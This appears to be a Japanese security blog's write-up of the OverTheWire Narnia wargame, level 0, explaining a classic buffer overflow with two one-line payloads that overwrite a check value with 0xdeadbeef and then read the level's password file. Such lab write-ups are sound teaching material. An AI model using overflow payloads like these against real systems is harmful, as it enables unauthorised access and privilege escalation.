Marsの5εcur1ty備忘録

不定期的にCTF、脆弱性検証、バグバウンティレポート分析など、情報セキュリティを中心とした技術ブログを更新します。

Overthewire Narnia Writeup

Level0

 最も典型的なバッファオーバーフローの例です。

  • Try:

f:id:z773733850:20190224142635p:plain

  • Payload:

 narnia0.cを見て、payloadを作ります。

( echo -e "AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde"; cat; ) | ./narnia0

f:id:z773733850:20190224143240p:plain

f:id:z773733850:20190224143705p:plain

 /etc/narnia_passに入りパスワードをゲットします。

f:id:z773733850:20190224144220p:plain

  • One more solution:

(python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; cat) | ./narnia0

※ catをつける理由:終了しないように状態を保持する

Level1

Copyright Mars 2019